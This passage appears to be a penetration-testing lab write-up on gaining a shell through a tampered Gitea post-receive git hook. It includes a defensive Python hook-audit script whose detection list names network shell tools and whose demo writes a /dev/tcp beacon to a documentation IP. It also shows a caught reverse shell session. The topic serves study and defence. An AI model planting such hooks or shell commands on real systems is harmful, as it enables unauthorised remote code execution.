Git Hook RCE


In Gitea, Git Hooks are scripts that run automatically during repository events, and if an attacker gains write access to them, they can modify these scripts to execute malicious code. By injecting commands into a server-side hook such as post-receive, an attacker can trigger Remote Code Execution (RCE) the next time someone pushes code, with the hook running as the user the Git service runs as. This technique is common in platforms that integrate CI/CD features, such as Gogs, Bitbucket, Jenkins, Travis CI, Azure DevOps, and GitLab, where automated processes often run with high privileges.
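Because a tampered hook looks like any other file in the bare repository, the defensive counterpart to this technique is a periodic audit of the hooks directory of every hosted repository. The script below is an added example written for this write-up, not code from Gitea or from the original post. It walks a directory tree laid out like Gitea's gitea-repositories/<owner>/<repo>.git, hashes each server-side hook, compares it against a known-good baseline, and additionally flags hooks containing indicators such as /dev/tcp/ or netcat invocations. The indicator list, the handler path /opt/platform/bin/hook-handler, the documentation-range IP address and the demo repository tree are all constructed for the example.

```python
"""Audit server-side git hooks in bare repositories for tampering (constructed example)."""
import hashlib
import os
import re
import stat
import tempfile
from pathlib import Path

# Hooks git runs on the receiving side of a push; these are the ones worth watching.
SERVER_SIDE_HOOKS = ("pre-receive", "update", "post-receive", "post-update")

# Constructed indicator list: strings that rarely belong in a hosted repository hook.
SUSPICIOUS_PATTERNS = (
    r"/dev/tcp/",
    r"\bnc\b|\bncat\b|\bnetcat\b",
    r"bash\s+-i",
    r"\bcurl\b|\bwget\b",
    r"base64\s+(-d|--decode)",
    r"python[23]?\s+-c",
)


def audit_repo(repo_path, baseline=None):
    """Return a list of findings for one bare repository.

    baseline maps hook name -> expected sha256 hex digest of the platform's
    stock hook; pass None to rely on pattern matching alone.
    """
    findings = []
    hooks_dir = Path(repo_path) / "hooks"
    if not hooks_dir.is_dir():
        return findings
    for name in SERVER_SIDE_HOOKS:
        hook = hooks_dir / name
        if not hook.is_file():
            continue
        raw = hook.read_bytes()
        digest = hashlib.sha256(raw).hexdigest()
        text = raw.decode("utf-8", errors="replace")
        reasons = []
        if baseline is not None and baseline.get(name) != digest:
            reasons.append("hash differs from baseline")
        for pattern in SUSPICIOUS_PATTERNS:
            if re.search(pattern, text):
                reasons.append(f"matches pattern {pattern!r}")
        if reasons:
            findings.append({
                "repo": str(repo_path),
                "hook": name,
                "executable": bool(hook.stat().st_mode & stat.S_IXUSR),
                "sha256": digest,
                "reasons": reasons,
            })
    return findings


def audit_tree(root, baseline=None):
    """Walk a gitea-repositories style tree and audit every *.git bare repo found."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        if dirpath.endswith(".git") and "hooks" in dirnames:
            findings.extend(audit_repo(dirpath, baseline))
            dirnames[:] = []  # do not descend into repository internals
    return findings


def build_demo_tree():
    """Create a constructed tree with one clean and one tampered repo.

    Returns (root, baseline) so the audit can be run against it.
    """
    root = Path(tempfile.mkdtemp(prefix="hook-audit-"))
    stock = (
        "#!/bin/sh\n"
        "# constructed stand-in for the platform's stock hook\n"
        "exec /opt/platform/bin/hook-handler post-receive\n"
    )
    # Constructed indicator line: a bare network write, not a working payload.
    tampered = (
        "#!/bin/sh\n"
        "echo beacon > /dev/tcp/203.0.113.5/4444\n"
        "exec /opt/platform/bin/hook-handler post-receive\n"
    )
    for repo, body in (("clean.git", stock), ("rce.git", tampered)):
        hook = root / "test" / repo / "hooks" / "post-receive"
        hook.parent.mkdir(parents=True)
        hook.write_text(body)
        os.chmod(hook, 0o755)
    baseline = {"post-receive": hashlib.sha256(stock.encode()).hexdigest()}
    return root, baseline


if __name__ == "__main__":
    demo_root, demo_baseline = build_demo_tree()
    for finding in audit_tree(demo_root, demo_baseline):
        print(f"{finding['repo']} {finding['hook']}: {', '.join(finding['reasons'])}")
```

In production the baseline would be generated once from a freshly created repository on the same Gitea version and stored outside the repository tree, so that an attacker who can write hooks cannot also rewrite the expected hashes; running the audit from cron as a user other than the Git service account keeps the check independent of the compromised context.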

I will use the post-receive Git Hook and add a reverse shell command to it. Then I just need to make any change to the repository, such as creating a new file. Upon clicking the Commit Changes button, the post-receive Git Hook gets executed:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/roquefort]
└─$ nnc 2222
listening on [any] 2222 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.206.67] 35642
bash: cannot set terminal process group (747): Inappropriate ioctl for device
bash: no job control in this shell
chloe@roquefort:~/gitea-repositories/test/rce.git$ whoami
whoami
chloe
chloe@roquefort:~/gitea-repositories/test/rce.git$ hostname
hostname
roquefort
chloe@roquefort:~/gitea-repositories/test/rce.git$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:15:1f brd ff:ff:ff:ff:ff:ff
    inet 192.168.206.67/24 brd 192.168.206.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the chloe user by exploiting Git Hooks.